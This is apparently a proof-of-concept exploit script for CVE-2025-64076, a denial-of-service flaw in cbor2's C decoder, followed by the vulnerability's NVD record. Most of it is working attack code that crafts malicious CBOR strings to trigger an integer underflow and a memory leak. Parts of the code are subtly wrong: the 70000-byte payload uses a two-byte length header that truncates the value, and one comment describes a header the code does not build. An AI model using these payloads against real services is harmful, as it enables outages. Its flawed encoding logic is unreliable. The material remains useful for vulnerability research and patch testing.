CVE-2025-64076

#!/usr/bin/env python3 """ PoC for CVE-2025-64076: cbor2 C Extension Decoder Integer Underflow and Memory Leak This PoC demonstrates the vulnerability in cbor2's decode_definite_long_string() function where improper handling of UTF-8 characters at 65536-byte chunk boundaries causes integer underflow and memory leaks. Affected: cbor2 <= 5.7.0 Fixed: cbor2 >= 5.7.1 """ import struct import sys def create_malicious_cbor_payload(): """ Create a malicious CBOR payload that triggers integer underflow in decode_definite_long_string() when multi-byte UTF-8 characters are positioned at 65536-byte chunk boundaries. """ payload = bytearray() # CBOR header for definite-length text string (Major type 3) # We need a string length that causes UTF-8 chars to span 65536 boundary # Target: 65535 bytes + 1 continuation byte at boundary # 65535 = 0xFFFF, encoded as 0x1A 0x00 0xFF 0xFF (32-bit uint) header = bytes([0x79, 0xFF, 0xFF]) # text string, length 65535 # First 65532 bytes of ASCII data payload.extend(b'A' * 65532) # Add 3-byte UTF-8 character (e.g., € which is 0xE2 0x82 0xAC) # This will cause buffer_length to not be properly reset at boundary payload.extend(b'\xe2\x82\xac') # 3-byte UTF-8 character # Prepend CBOR header full_payload = header + bytes(payload) return bytes(full_payload) def create_large_cbor_for_memory_leak(): """ Create a large CBOR payload to demonstrate memory leak. For strings > 65536 bytes, each chunk leaks Python object references. """ # Create CBOR with large definite-length string (> 65536 bytes) payload = bytearray() # Header: text string with length > 65536 # 70000 = 0x00011170, use 3-byte encoding length = 70000 header = bytes([0x79, (length >> 8) & 0xFF, length & 0xFF]) # Fill with data containing UTF-8 characters at chunk boundaries payload.extend(b'B' * 65534) payload.extend(b'\xe2\x82\xac') # UTF-8 char at boundary payload.extend(b'C' * (length - 65536)) return header + bytes(payload) def test_vulnerability(): """Test if the cbor2 library is vulnerable""" try: import cbor2 print(f"[+] cbor2 version: {cbor2.__version__}") except ImportError: print("[-] cbor2 not installed. Install with: pip install cbor2") print(" Note: Install version <= 5.7.0 to test vulnerability") return False # Check if using C extension (vulnerable path) try: from cbor2 import CBORDecoder from io import BytesIO # Test 1: Integer underflow PoC print("\n[*] Test 1: Testing integer underflow vulnerability...") try: malicious_payload = create_malicious_cbor_payload() decoder = CBORDecoder(BytesIO(malicious_payload)) result = decoder.decode() print(f"[!] Unexpected: Decoding succeeded, result length: {len(result)}") except Exception as e: print(f"[!] Exception caught: {type(e).__name__}: {e}") if "memory" in str(e).lower() or "decode" in str(e).lower(): print("[+] Vulnerability triggered - integer underflow detected") # Test 2: Memory leak demonstration print("\n[*] Test 2: Testing memory leak vulnerability...") print(" Note: Monitor memory usage during decoding") try: large_payload = create_large_cbor_for_memory_leak() decoder = CBORDecoder(BytesIO(large_payload)) result = decoder.decode() print(f"[!] Decoded successfully, length: {len(result)}") except Exception as e: print(f"[!] Exception: {type(e).__name__}: {e}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 70) print("CVE-2025-64076 PoC - cbor2 Integer Underflow and Memory Leak") print("=" * 70) print("\nVulnerability Description:") print(" - Integer underflow in decode_definite_long_string()") print(" - Memory leak due to missing Py_DECREF calls") print(" - Both can cause denial of service\n") test_vulnerability() print("\n" + "=" * 70) print("Remediation: Upgrade to cbor2 >= 5.7.1") print("Commit: 851473490281f82d82560b2368284ef33cf6e8f9") print("=" * 70)

{"cve": {"id": "CVE-2025-64076", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:14.263", "lastModified": "2025-12-31T02:02:14.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple vulnerabilities exist in cbor2 through version 5.7.0 in the decode_definite_long_string() function of the C extension decoder (source/decoder.c): (1) Integer Underflow Leading to Out-of-Bounds Read (CWE-191, CWE-125): An incorrect variable reference and missing state reset in the chunk processing loop causes buffer_length to not be reset to zero after UTF-8 character consumption. This results in subsequent chunk_length calculations producing negative values (e.g., chunk_length = 65536 - buffer_length), which are passed as signed integers to the read() method, potentially triggering unlimited read operations and resource exhaustion. (2) Memory Leak via Missing Reference Count Release (CWE-401): The main processing loop fails to release Python object references (Py_DECREF) for chunk objects allocated in each iteration. For CBOR strings longer than 65536 bytes, this causes cumulative memory leaks proportional to the payload size, enabling memory exhaustion attacks through repeated processing of large CBOR payloads. Both vulnerabilities can be exploited remotely without authentication by sending specially-crafted CBOR data containing definite-length text strings with multi-byte UTF-8 characters positioned at 65536-byte chunk boundaries. Successful exploitation results in denial of service through process crashes (CBORDecodeEOF exceptions) or memory exhaustion. The vulnerabilities affect all applications using cbor2's C extension to process untrusted CBOR data, including web APIs, IoT data collectors, and message queue processors. Fixed in commit 851473490281f82d82560b2368284ef33cf6e8f9 pushed with released version 5.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*", "versionEndIncluding": "5.7.0", "matchCriteriaId": "AE04A1BB-A030-4607-9B76-8CFEC625F070"}]}]}], "references": [{"url": "https://github.com/agronholm/cbor2/commit/851473490281f82d82560b2368284ef33cf6e8f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/agronholm/cbor2/issues/264", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/agronholm/cbor2/pull/265", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}